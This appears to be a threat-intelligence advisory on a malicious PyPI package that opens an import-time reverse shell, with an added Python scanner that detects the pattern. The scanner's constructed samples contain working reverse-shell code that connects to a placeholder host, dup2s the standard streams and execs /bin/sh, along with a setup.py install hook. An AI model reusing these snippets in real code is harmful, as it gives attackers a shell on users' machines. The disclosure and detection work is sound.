THREATPKG

Supply-chain threat intelligence

Incident detail

critical · pypi · malware · osv

Malicious code in acme-widget-layout-utils (PyPI)

acme-widget-layout-utils

Risk score

92

AI summary

Indexed incident for acme-widget-layout-utils (pypi).

Description

On first import, src/acme_widget_layout_utils/__init__.py (lines 13-17) opens a TCP socket to 34.69.137.236:80, duplicates stdin, stdout and stderr onto that socket with os.dup2, and execs /bin/sh -i: a textbook interactive reverse shell that hands a shell on the importing host, with the privileges of the importing process, to whoever controls 34.69.137.236. The behaviour is unconditional and fires the moment any consumer runs import acme_widget_layout_utils. setup.py additionally registers a custom install command that writes /tmp/pypi_install_hook_marker.txt at install time, so code also runs during pip install, before any import (such a hook executes when the package is built from its sdist; a prebuilt wheel does not run setup.py); the marker corroborates that the package is a deliberately crafted attack artifact. The name suggests benign UI/layout utilities, but the package contains no such functionality. The pyproject.toml description openly self-identifies as a 'pentest C2 target', yet the package is published on public PyPI under a generic name, where any developer searching for widget or layout helpers can install it incidentally and be backdoored. The README's 'authorized pentest' framing does not change the installer-side impact.
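The import-time reverse shell and the setup.py install hook described above can be screened for statically before a package is ever installed. The following is an added example written for this page, not ThreatPkg's detector and not code from the package: it walks each module's AST and reports when a socket connect, os.dup2 and an exec of /bin/sh are all reachable at import time (top-level code, or a module-level function that top-level code calls), and when setup() overrides the install command through cmdclass. The sample sources inside it are constructed for the example, with the documentation address 192.0.2.10 standing in for the real IOC 34.69.137.236:80; they are not the package's actual files.

```python
"""Static triage for import-time reverse shells and setup.py install hooks.

Added example for this page; not ThreatPkg's detector and not the code of
acme-widget-layout-utils. Sample sources at the bottom are constructed.
"""
import ast
from dataclasses import dataclass, field

SHELL_TOKENS = {"/bin/sh", "/bin/bash", "sh", "bash"}


@dataclass
class Finding:
    module: str
    signals: set = field(default_factory=set)

    @property
    def reverse_shell(self) -> bool:
        # connect + dup2 + shell exec at import time is the pattern on this page
        return {"connect", "dup2", "exec_shell"} <= self.signals


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _string_tokens(call):
    """Whitespace-split tokens of every literal string argument (incl. in lists)."""
    literals = []
    for a in call.args:
        elts = a.elts if isinstance(a, (ast.List, ast.Tuple)) else [a]
        literals += [e.value for e in elts
                     if isinstance(e, ast.Constant) and isinstance(e.value, str)]
    return {tok for s in literals for tok in s.split()}


def _calls_reachable_on_import(tree):
    """Yield Call nodes run at import: everything outside def/class bodies, plus
    bodies of module-level functions that import-time code calls directly
    (the common 'def _boot(): ...; _boot()' wrapper)."""
    funcs = {n.name: n for n in tree.body
             if isinstance(n, (ast.FunctionDef, ast.AsyncFunctionDef))}
    expanded = set()
    stack = list(tree.body)
    while stack:
        node = stack.pop()
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef, ast.Lambda)):
            continue  # not executed at import time
        if isinstance(node, ast.Call):
            yield node
            name = _dotted(node.func)
            if name in funcs and name not in expanded:
                expanded.add(name)
                stack.extend(funcs[name].body)
        stack.extend(ast.iter_child_nodes(node))


def scan_module(name, source):
    """Return a Finding listing the import-time signals present in `source`."""
    f = Finding(name)
    for call in _calls_reachable_on_import(ast.parse(source)):
        target = _dotted(call.func) or ""
        if target in ("socket.socket", "socket.create_connection"):
            f.signals.add("socket")
        if target.endswith(".connect") or target == "socket.create_connection":
            f.signals.add("connect")
        if target == "os.dup2":
            f.signals.add("dup2")
        if (target.startswith(("os.exec", "os.spawn", "subprocess."))
                or target in ("os.system", "os.popen", "pty.spawn")) \
                and SHELL_TOKENS & _string_tokens(call):
            f.signals.add("exec_shell")
        if target.endswith("setup") and any(kw.arg == "cmdclass" for kw in call.keywords):
            f.signals.add("setup_cmdclass")  # custom install/develop command
    return f


def scan_package(files):
    """files: {relative path: source}. Returns only findings that carry a signal."""
    return [r for r in (scan_module(p, s) for p, s in files.items()) if r.signals]


# Constructed samples (not the package's real files). 192.0.2.10 is a
# documentation-range placeholder for the page's IOC 34.69.137.236:80.
MALICIOUS_INIT = """
import os, socket, subprocess
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.0.2.10", 80))
for fd in (0, 1, 2):
    os.dup2(s.fileno(), fd)
subprocess.call(["/bin/sh", "-i"])
"""
DEFERRED_INIT = """
import os, socket
def _boot():
    s = socket.socket()
    s.connect(("192.0.2.10", 80))
    os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2)
    os.execv("/bin/sh", ["/bin/sh", "-i"])
_boot()
"""
BENIGN_INIT = """
import socket
def fetch(host, port=80):
    return socket.create_connection((host, port))  # only runs when called
"""
HOOKED_SETUP = """
from setuptools import setup
from setuptools.command.install import install
class Hook(install):
    def run(self):
        open("/tmp/marker.txt", "w").close()
        install.run(self)
setup(name="x", version="0.0.3", cmdclass={"install": Hook})
"""

if __name__ == "__main__":
    sample = {"pkg/__init__.py": MALICIOUS_INIT, "deferred/__init__.py": DEFERRED_INIT,
              "benign/__init__.py": BENIGN_INIT, "setup.py": HOOKED_SETUP}
    for r in scan_package(sample):
        print(r.module, sorted(r.signals), "REVERSE SHELL" if r.reverse_shell else "")
```

Run it against an unpacked sdist obtained with pip download --no-deps --no-binary :all: rather than against an installed copy, so nothing from the package executes first. The benign sample shows why the scanner looks only at code reachable on import: the same socket call inside a function that nothing calls is ordinary networking, not a backdoor. The scanner is deliberately cheap and will not see through an obfuscated payload (for example a base64 blob passed to exec); treat a clean result as "no obvious import-time shell", not as a clearance.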

Technical details

Affected versions

= 0.0.3

Indicators

  • affected version = 0.0.3 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents